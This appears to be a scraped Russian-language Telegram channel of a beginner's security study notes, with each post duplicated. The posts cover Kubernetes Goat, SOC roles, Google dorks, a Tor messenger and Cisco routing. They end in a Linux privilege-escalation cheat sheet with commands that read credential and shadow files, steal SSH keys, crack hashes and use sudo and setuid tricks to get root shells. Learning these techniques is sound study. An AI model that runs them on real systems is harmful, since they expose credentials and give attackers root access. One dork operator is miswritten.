Всем привет и вы попали к начинающему ИТ-специалисту! 📢
Не буду лукавить, данный канал является моей "тетрадкой с конспектами" в ИТ-мире, а если быть конкретнее то в сфере Информационной Безопасности.
В поисках информации по моей любимой сфере я решил записывать и выкладывать такие вещи:
⚒ Полезные инструменты по ИБ и не только
📄 Интересные ресурсы/площадки/мероприятия
💻 Скрипты на языках программирования как: Python/Go
🗞 Статьи
Monkey Hacker - сообщество, которым курирует один человек, поэтому контент может появляться в любое время.
Надеюсь, что данный канал поможет не только мне...
Не буду лукавить, данный канал является моей "тетрадкой с конспектами" в ИТ-мире, а если быть конкретнее то в сфере Информационной Безопасности.
В поисках информации по моей любимой сфере я решил записывать и выкладывать такие вещи:
⚒ Полезные инструменты по ИБ и не только
📄 Интересные ресурсы/площадки/мероприятия
💻 Скрипты на языках программирования как: Python/Go
🗞 Статьи
Monkey Hacker - сообщество, которым курирует один человек, поэтому контент может появляться в любое время.
Надеюсь, что данный канал поможет не только мне...
Monkey Hacker pinned «Всем привет и вы попали к начинающему ИТ-специалисту! 📢 Не буду лукавить, данный канал является моей "тетрадкой с конспектами" в ИТ-мире, а если быть конкретнее то в сфере Информационной Безопасности. В поисках информации по моей любимой сфере я решил записывать…»
Kubernetes Goat v2 🐐
Достаточно интересный проект, если вы хотели бы протестировать K8S
▶️Источник
Недавно вышел новый релиз проекта Kubernetes Goat – заведомо уязвимого кластера, на котором можно изучать аспекты ИБ K8S не только теоретически, но и практически.
Помимо этого, был подготовлен новый web site, на котором можно получить детальную информацию о проекте и лабораторных работах.
На текущий момент есть 20 (19,5, т.к. Tiller уже редко где используется, если используется вообще) лабораторных работ. Например:
🍭 Falco - Runtime security monitoring & detection
🍭 Secure network boundaries using Network Security Policies
🍭 RBAC least privileges misconfiguration
🍭 DIND (docker-in-docker) exploitation
🍭 Container escape to the host system и многое другое!
У каждой лабораторной есть исчерпывающее описание и детальные инструкции о том, как ее реализовать. Впрочем, если не «хотите подсматривать» - можно пройти все лабораторные самостоятельно.
И, как обычно, много общей полезной информации на тему контейнеров и оркестрации – от cheatsheet до ссылок на разные интересные ресурсы.
Достаточно интересный проект, если вы хотели бы протестировать K8S
▶️Источник
Недавно вышел новый релиз проекта Kubernetes Goat – заведомо уязвимого кластера, на котором можно изучать аспекты ИБ K8S не только теоретически, но и практически.
Помимо этого, был подготовлен новый web site, на котором можно получить детальную информацию о проекте и лабораторных работах.
На текущий момент есть 20 (19,5, т.к. Tiller уже редко где используется, если используется вообще) лабораторных работ. Например:
🍭 Falco - Runtime security monitoring & detection
🍭 Secure network boundaries using Network Security Policies
🍭 RBAC least privileges misconfiguration
🍭 DIND (docker-in-docker) exploitation
🍭 Container escape to the host system и многое другое!
У каждой лабораторной есть исчерпывающее описание и детальные инструкции о том, как ее реализовать. Впрочем, если не «хотите подсматривать» - можно пройти все лабораторные самостоятельно.
И, как обычно, много общей полезной информации на тему контейнеров и оркестрации – от cheatsheet до ссылок на разные интересные ресурсы.
Telegram
DevSecOps Talks
Kubernetes Goat v2
Всем привет!
Недавно вышел новый релиз проекта Kubernetes Goat – заведомо уязвимого кластера, на котором можно изучать аспекты ИБ K8S не только теоретически, но и практически.
Помимо этого, был подготовлен новый web site, на котором…
Всем привет!
Недавно вышел новый релиз проекта Kubernetes Goat – заведомо уязвимого кластера, на котором можно изучать аспекты ИБ K8S не только теоретически, но и практически.
Помимо этого, был подготовлен новый web site, на котором…
#SOC
Что такое SOC?🧐
SOC - предоставляют широкий спектр услуг, начиная с мониторинга и управления и заканчивая комплексными решениями угроз и размещенной безопасностью, которые можно настроить в соответствии с потребностями заказчиков.
Основные элементы SOC:
◾️Процесс
◾️Люди
◾️Технология
Классификация людей в SOC:
🔸Аналитики предупреждения уровня 1 - эти специалисты отслеживают входящие оповещения, проверяют, действительно ли произошел инцидент, и при необходимости перенаправляют обращения на уровень 2 (мониторинг, открытие заявок, базовые меры по устранению угроз)
🔸Специалисты уровня 2 - ответственные за реагирование на инциденты - эти специалисты должны проводить доскональное расследование инцидентов и давать рекомендации по их устранению или действиям, которые необходимо предпринять (углубленное расследование; советы по восстановлению)
🔸Охотники уровня 3 - обладают знаниями экспертного уровня в области сетей, конечных точек, аналитики угроз и обратной разработки вредоносного ПО. Они являются экспертами в отслеживании работы вредоносного ПО, чтобы определить его влияние и способы его удаления. Они также активно участвуют в поиске потенциальных угроз и внедрении инструментов обнаружения угроз. (углубленные знания; охота на угрозы; профилактические меры)
Что такое SOC?🧐
SOC - предоставляют широкий спектр услуг, начиная с мониторинга и управления и заканчивая комплексными решениями угроз и размещенной безопасностью, которые можно настроить в соответствии с потребностями заказчиков.
Основные элементы SOC:
◾️Процесс
◾️Люди
◾️Технология
Классификация людей в SOC:
🔸Аналитики предупреждения уровня 1 - эти специалисты отслеживают входящие оповещения, проверяют, действительно ли произошел инцидент, и при необходимости перенаправляют обращения на уровень 2 (мониторинг, открытие заявок, базовые меры по устранению угроз)
🔸Специалисты уровня 2 - ответственные за реагирование на инциденты - эти специалисты должны проводить доскональное расследование инцидентов и давать рекомендации по их устранению или действиям, которые необходимо предпринять (углубленное расследование; советы по восстановлению)
🔸Охотники уровня 3 - обладают знаниями экспертного уровня в области сетей, конечных точек, аналитики угроз и обратной разработки вредоносного ПО. Они являются экспертами в отслеживании работы вредоносного ПО, чтобы определить его влияние и способы его удаления. Они также активно участвуют в поиске потенциальных угроз и внедрении инструментов обнаружения угроз. (углубленные знания; охота на угрозы; профилактические меры)
#web
Google Dorking📄
Google hacking / Dorking использует расширенные возможности поисковой системы Google, которые позволяют вам выбирать пользовательский контент. Например, вы можете выбрать результаты с определенного доменного имени с помощью фильтра site:, а затем сопоставить их с определенными поисковыми терминами, например, со словом admin (site:google.com admin), что вернет результаты только с сайта google.com, содержащего слово admin. Вы также можете комбинировать несколько фильтров. Вот пример нескольких фильтров, которые вы можете использовать:
🔸site:google.com - возвращает результаты только с указанного адреса сайта
🔸inurl:admin - возвращает результаты, в URL которых есть указанное слово
🔸filetype:pdf - возвращает результаты, соответствующие определенному расширению файла
🔸innoscript:admin - возвращает результаты, содержащие указанное слово в заголовке
Google Dorking📄
Google hacking / Dorking использует расширенные возможности поисковой системы Google, которые позволяют вам выбирать пользовательский контент. Например, вы можете выбрать результаты с определенного доменного имени с помощью фильтра site:, а затем сопоставить их с определенными поисковыми терминами, например, со словом admin (site:google.com admin), что вернет результаты только с сайта google.com, содержащего слово admin. Вы также можете комбинировать несколько фильтров. Вот пример нескольких фильтров, которые вы можете использовать:
🔸site:google.com - возвращает результаты только с указанного адреса сайта
🔸inurl:admin - возвращает результаты, в URL которых есть указанное слово
🔸filetype:pdf - возвращает результаты, соответствующие определенному расширению файла
🔸innoscript:admin - возвращает результаты, содержащие указанное слово в заголовке
cwtch.im — еще один безопасный мессенджер, работающий через Tor.
— Децентрализован, открытый исходный код, собственный протокол cwtch;
— Сквозное шифрование сообщений;
— Трафик через сеть Tor;
— Почти полное отсутствие метаданных (meta-data resistant)
— Децентрализован, открытый исходный код, собственный протокол cwtch;
— Сквозное шифрование сообщений;
— Трафик через сеть Tor;
— Почти полное отсутствие метаданных (meta-data resistant)
Настройка маршрутизации на оборудования Cisco 🗞
🔸Настройка статической маршрутизации:
ip route 172.16.0.0 255.255.255.128 Serial0/0/0 - это команда для ввода статического маршрута
Вкратце: ip route - это команда, говорящая роутеру, что сейчас будет введен статический маршрут; 172.16.0.0 - это удаленная и неизвестная роутеру сеть; 255.255.255.128 - это маска удаленной сети; serial0/0/0 - это на какой шлюз мы хотим переслать пакеты, т.е адрес/интерфейс другого роутера
🔸Настройка RIP:
router rip - этой командой мы включаем протокол RIP на маршрутизаторе, и оказываемся в режиме конфигурации протокола
version 2 - включаем RIP Version 2
no auto-summary - отключаем автоматическое суммирование маршрутов
network <IP> - вводим сети, которые будут передаваться другим роутерам
🔸Настройка OSPF:
router ospf <NUM> - назначаем процесс ospf
router-id <ID> - прописываем id (1.1.1.1 к примеру)
network <IP> <WILCD_CARD_MASK> area 0 – назначаем подключенные сети к роутеру
passive-interface <INTERFACE> - отключаем интерфейсы
🔸Настройка статической маршрутизации:
ip route 172.16.0.0 255.255.255.128 Serial0/0/0 - это команда для ввода статического маршрута
Вкратце: ip route - это команда, говорящая роутеру, что сейчас будет введен статический маршрут; 172.16.0.0 - это удаленная и неизвестная роутеру сеть; 255.255.255.128 - это маска удаленной сети; serial0/0/0 - это на какой шлюз мы хотим переслать пакеты, т.е адрес/интерфейс другого роутера
🔸Настройка RIP:
router rip - этой командой мы включаем протокол RIP на маршрутизаторе, и оказываемся в режиме конфигурации протокола
version 2 - включаем RIP Version 2
no auto-summary - отключаем автоматическое суммирование маршрутов
network <IP> - вводим сети, которые будут передаваться другим роутерам
🔸Настройка OSPF:
router ospf <NUM> - назначаем процесс ospf
router-id <ID> - прописываем id (1.1.1.1 к примеру)
network <IP> <WILCD_CARD_MASK> area 0 – назначаем подключенные сети к роутеру
passive-interface <INTERFACE> - отключаем интерфейсы
#linux
Linux Privilege Escalation Cheat Sheet 🗞
🔸Stored Password:
OpenVPN:
1. Попробуйте написать: cat /home/user/myvpn.ovpn
2. Из вывода команды запомните путь: “auth-user-pass”.
3.Следующая команда примерно будет такой: cat /etc/openvpn/auth.txt
History:
1. Попробуйте: cat ~/.bash_history | grep -i passw
🔸Weak File Permission:
1. cat /etc/passwd
2. unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
3. hashcat -m 1800 unshadowed.txt rockyou.txt -O
🔸SSH-Keys:
1. find / -name authorized_keys 2> /dev/null
2. find / -name id_rsa 2> /dev/null
3. Скопируйте содержимое id_rsa на атакующую машину
4. chmod 400 id_rsa
5. ssh -i id_rsa root@<ip>
🔸Shell-Escalating:
1. Попробуйте выполнить следующее: sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --noscript=shell.nse
sudo vim -c '!sh'
🔸Abusing Intended Functionality:
На примере Apach2:
sudo apache2 -f /etc/shadow
Уже из основной машины: '[Pasted Root Hash]' > hash.txt И john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
🔸SUID Environment Variables:
1. find / -type f -perm -04000 -ls 2>/dev/null
2. strings /usr/local/bin/suid-env
🔸Capability:
1. getcap -r / 2>/dev/null
2. Запомните значение: “cap_setuid”
3. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Linux Privilege Escalation Cheat Sheet 🗞
🔸Stored Password:
OpenVPN:
1. Попробуйте написать: cat /home/user/myvpn.ovpn
2. Из вывода команды запомните путь: “auth-user-pass”.
3.Следующая команда примерно будет такой: cat /etc/openvpn/auth.txt
History:
1. Попробуйте: cat ~/.bash_history | grep -i passw
🔸Weak File Permission:
1. cat /etc/passwd
2. unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
3. hashcat -m 1800 unshadowed.txt rockyou.txt -O
🔸SSH-Keys:
1. find / -name authorized_keys 2> /dev/null
2. find / -name id_rsa 2> /dev/null
3. Скопируйте содержимое id_rsa на атакующую машину
4. chmod 400 id_rsa
5. ssh -i id_rsa root@<ip>
🔸Shell-Escalating:
1. Попробуйте выполнить следующее: sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --noscript=shell.nse
sudo vim -c '!sh'
🔸Abusing Intended Functionality:
На примере Apach2:
sudo apache2 -f /etc/shadow
Уже из основной машины: '[Pasted Root Hash]' > hash.txt И john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
🔸SUID Environment Variables:
1. find / -type f -perm -04000 -ls 2>/dev/null
2. strings /usr/local/bin/suid-env
🔸Capability:
1. getcap -r / 2>/dev/null
2. Запомните значение: “cap_setuid”
3. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
👍4
